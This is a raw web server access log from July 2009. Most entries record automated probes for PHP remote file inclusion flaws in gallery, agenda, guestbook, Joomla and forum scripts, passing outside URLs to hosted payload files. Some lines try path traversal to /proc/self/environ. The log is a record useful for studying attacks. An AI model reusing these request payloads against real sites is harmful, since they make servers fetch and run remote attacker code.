76.12.17.218 - - [15/Jul/2009:05:40:15 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:40:15 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:40:15 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:40:16 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:40:16 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:40:16 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:40:17 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:40:18 -0400] "GET /logs//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:40:21 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:40:22 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:40:45 -0400] "GET /logs/access_log.Q109061800//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 258 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:41:11 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
202.125.45.45 - - [15/Jul/2009:05:41:19 -0400] "GET /logs/access_log.Q109070200%20/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 250 "-" "libwww-perl/5.805"
190.144.44.36 - - [15/Jul/2009:05:41:35 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:41:36 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:41:43 -0400] "GET /logs/access_log.Q109061100%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:05:41:47 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:05:41:47 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:05:41:47 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:05:41:51 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:41:55 -0400] "GET /logs/access_log.Q109061300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:42:04 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
190.144.44.36 - - [15/Jul/2009:05:42:04 -0400] "GET /logs/access_log.Q109052000%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:10 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:13 -0400] "GET /logs/access_log.Q109061800%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:14 -0400] "GET /logs/access_log.Q109051600////?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:14 -0400] "GET ////?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 454 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:14 -0400] "GET /logs////?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 200 9599 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:37 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:39 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt???? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:39 -0400] "GET //skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt???? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:45 -0400] "GET /logs/access_log.Q109061100%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:46 -0400] "GET /logs/access_log.Q109061100%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:46 -0400] "GET //skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 223 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:46 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:46 -0400] "GET /logs//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 228 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:46 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:46 -0400] "GET /logs/access_log.Q109051700%20%20//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:42:46 -0400] "GET /logs/access_log.Q109051300%20%20//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt???? HTTP/1.1" 404 252 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:42:49 -0400] "GET /logs/access_log.Q109052300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:43:08 -0400] "GET /logs/access_log.Q109061300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:43:09 -0400] "GET /logs/access_log.Q109061300%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:43:16 -0400] "GET /logs/access_log.Q109052000%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
201.232.54.48 - - [15/Jul/2009:05:43:21 -0400] "GET /logs/access_log.Q109052000%20%20//modules/agendax/addevent.inc.php?agendax_path=http://aboutav.com//id1.txt??? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:43:35 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jul/2009:05:43:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
94.102.9.216 - - [15/Jul/2009:05:44:25 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:25 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:27 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:27 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:30 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:34 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:35 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:36 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
66.249.68.70 - - [15/Jul/2009:05:44:38 -0400] "GET /images/items/index5_periolev.jpg HTTP/1.1" 200 3646 "-" "Googlebot-Image/1.0"
94.102.9.216 - - [15/Jul/2009:05:44:39 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:39 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:44:45 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
87.229.45.106 - - [15/Jul/2009:05:44:47 -0400] "GET //components/com_forum/download.php?phpbb_root_path=http://www.a-s-f.at/dreck/test.txt?? HTTP/1.1" 404 232 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
87.229.45.106 - - [15/Jul/2009:05:44:47 -0400] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.a-s-f.at/dreck/test.txt?? HTTP/1.1" 404 237 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
94.102.9.216 - - [15/Jul/2009:05:44:58 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:05:45:20 -0400] "GET //wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:05:45:20 -0400] "GET /logs//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 265 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:05:45:20 -0400] "GET /logs/access_log.Q109062300%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
62.152.230.26 - - [15/Jul/2009:05:45:33 -0400] "GET /logs/access_log.Q109052900%20%20//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 289 "-" "Mozilla/5.0"
62.149.163.198 - - [15/Jul/2009:05:47:22 -0400] "GET /logs/access_log.Q109070800///advguestbook/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 250 "-" "Mozilla/1.22 (compatible; MSIE 1.5; Windows NT)"
62.149.163.198 - - [15/Jul/2009:05:47:23 -0400] "GET /logs/access_log.Q109070800/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 235 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [15/Jul/2009:05:47:23 -0400] "GET /logs/access_log.Q109070800///advguestbook/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 250 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:05:47:23 -0400] "GET /logs/access_log.Q109070800///advguestbook/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 250 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET /logs///advguestbook/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 228 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET ///advguestbook/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 223 "-" "Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.9 sun4u; X11)"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET /logs/errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 213 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET /errors.php?error=http://www.univers-du-pin.be/buggsbunny?? HTTP/1.1" 404 208 "-" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET ///advguestbook/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 223 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET /logs///advguestbook/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ HTTP/1.1" 404 228 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET ///advguestbook/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 223 "-" "XXXXXX"
62.149.163.198 - - [15/Jul/2009:05:47:27 -0400] "GET /logs///advguestbook/errors.php?error=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 228 "-" "XXXXXX"
209.59.12.99 - - [15/Jul/2009:05:48:56 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
61.78.62.84 - - [15/Jul/2009:05:49:07 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:49:07 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt?? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:05:49:28 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
67.18.63.194 - - [15/Jul/2009:05:49:32 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:49:59 -0400] "GET /logs/access_log.Q109051300//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
61.78.62.84 - - [15/Jul/2009:05:50:09 -0400] "GET /logs/access_log.Q109051700//skin/zero_vote/error.php?dir=http://www.sayphoto.net/~jtbl/zb//skin/ggambo7002_board/copy/id1.txt???? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
87.106.245.84 - - [15/Jul/2009:05:50:11 -0400] "GET /logs/access_log.Q109060400/popup.php?path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
87.106.245.84 - - [15/Jul/2009:05:50:14 -0400] "GET /logs/access_log.Q109053000/popup.php?path=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 234 "-" "Mozilla/5.0"
76.12.17.218 - - [15/Jul/2009:05:52:35 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
72.30.161.230 - - [15/Jul/2009:05:52:12 -0400] "GET /logs/access_log.Q109063000 HTTP/1.0" 200 5874408 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
201.232.54.48 - - [15/Jul/2009:05:53:42 -0400] "GET /logs/access_log.Q109051600%20%20////?_SERVER[DOCUMENT_ROOT]=http://dwno.or.kr/bbs/zipcode/tes?? HTTP/1.1" 404 230 "-" "Mozilla/5.0"
202.125.45.45 - - [15/Jul/2009:05:54:25 -0400] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:54:25 -0400] "GET /logs/access_log.Q109060600/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:54:25 -0400] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:54:39 -0400] "GET /logs/access_log.Q109051300/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:54:50 -0400] "GET /administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 222 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:54:50 -0400] "GET /logs/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:54:50 -0400] "GET /logs/access_log.Q109052000/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 249 "-" "libwww-perl/5.805"
202.125.45.45 - - [15/Jul/2009:05:54:50 -0400] "GET /logs/error_log.Q109051900/administrator/index3.php?mosConfig_absolute_path=http://www.mevabe.vn/cache/index.txt??? HTTP/1.1" 404 248 "-" "libwww-perl/5.805"
65.55.105.230 - - [15/Jul/2009:05:54:52 -0400] "GET /logs/access_log.Q108123100 HTTP/1.1" 404 224 "-" "msnbot/1.1 (+http://search.msn.com/msnbot.htm)"
76.12.17.218 - - [15/Jul/2009:05:54:57 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://fcbarcelonanyc.com/help/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jul/2009:05:55:13 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
174.37.32.229 - - [15/Jul/2009:05:55:22 -0400] "GET /logs/ HTTP/1.1" 200 9592 "-" "BlackBerry7100i/4.1.0 Profile/MIDP-2.0 Configuration/CLDC-1.1 VendorID/103"
94.102.9.216 - - [15/Jul/2009:05:57:39 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:57:47 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
61.250.85.185 - - [15/Jul/2009:05:58:02 -0400] "GET /logs/access_log.Q109052700//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.250.85.185 - - [15/Jul/2009:05:58:02 -0400] "GET /logs//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.185 - - [15/Jul/2009:05:58:02 -0400] "GET //Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:58:14 -0400] "GET /logs/access_log.Q109062300//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
94.102.9.216 - - [15/Jul/2009:05:58:34 -0400] "GET /logs/access_log.Q109051500//wp-content/plugins/mygallery/myfunctions/mygallerybrowser.php?myPath=http://geschenkpuzzle.de/logs/session/idxx.txt?? HTTP/1.1" 404 287 "-" "Mozilla/5.0"
200.107.138.34 - - [15/Jul/2009:05:59:08 -0400] "GET /logs/access_log.Q109070600//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
200.107.138.34 - - [15/Jul/2009:05:59:10 -0400] "GET //Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.107.138.34 - - [15/Jul/2009:05:59:10 -0400] "GET /logs//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.185 - - [15/Jul/2009:05:59:12 -0400] "GET /logs//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
61.250.85.185 - - [15/Jul/2009:05:59:12 -0400] "GET /logs/access_log.Q109052700//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 246 "-" "Mozilla/5.0"
61.250.85.185 - - [15/Jul/2009:05:59:12 -0400] "GET //Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.107.138.34 - - [15/Jul/2009:06:00:05 -0400] "GET /logs//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 224 "-" "Mozilla/5.0"
200.107.138.34 - - [15/Jul/2009:06:00:05 -0400] "GET //Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 219 "-" "Mozilla/5.0"
200.107.138.34 - - [15/Jul/2009:06:00:05 -0400] "GET /logs/access_log.Q109052700%20%20//Sources/Packages.php?sourcedir=http://www.phosphor.se/components/idxx.txt??? HTTP/1.1" 404 248 "-" "Mozilla/5.0"
209.59.12.99 - - [15/Jul/2009:06:00:15 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
118.129.166.129 - - [15/Jul/2009:06:01:03 -0400] "GET /logs/access_log.Q109052000/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
118.129.166.129 - - [15/Jul/2009:06:01:03 -0400] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
118.129.166.129 - - [15/Jul/2009:06:01:04 -0400] "GET /com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 238 "-" "libwww-perl/5.79"
59.22.140.17 - - [15/Jul/2009:06:01:23 -0400] "GET /logs/access_log.Q109052000/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 265 "-" "libwww-perl/5.79"
59.22.140.17 - - [15/Jul/2009:06:01:23 -0400] "GET /logs/com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://for.caucasus.net/id.txt???? HTTP/1.1" 404 243 "-" "libwww-perl/5.79"
